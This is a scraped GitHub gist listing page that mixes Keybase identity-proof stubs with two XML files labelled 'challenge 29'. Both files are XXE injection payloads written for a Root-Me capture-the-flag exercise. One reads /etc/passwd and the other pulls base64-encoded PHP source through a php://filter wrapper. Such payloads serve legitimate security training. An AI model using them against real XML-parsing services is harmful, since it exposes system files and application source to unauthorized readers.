Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am niafreu on github.
  • I am hellnia (https://keybase.io/hellnia) on keybase.
  • I have a public key ASD8DdFq00oBe_DTgIph0WBHM8n2MJSwgCdkvCyNmGKIYAo

To claim this, I am signing this object:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE rss [
<!ELEMENT title ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://challenge01.root-me.org/web-serveur/ch29/index.php?action=auth" >
]>
<rss version="1.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
@niafreu
niafreu / ch29.xml
Created April 14, 2021 16:23
challenge 29
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE rss [
<!ELEMENT title ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<rss version="1.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>

Keybase proof

I hereby claim:

  • I am niafreu on github.
  • I am lgnobre (https://keybase.io/lgnobre) on keybase.
  • I have a public key ASCnLesgGk2s2X_we84OSTxbxdwpQiS8jfHKd3Op6X9g2wo

To claim this, I am signing this object: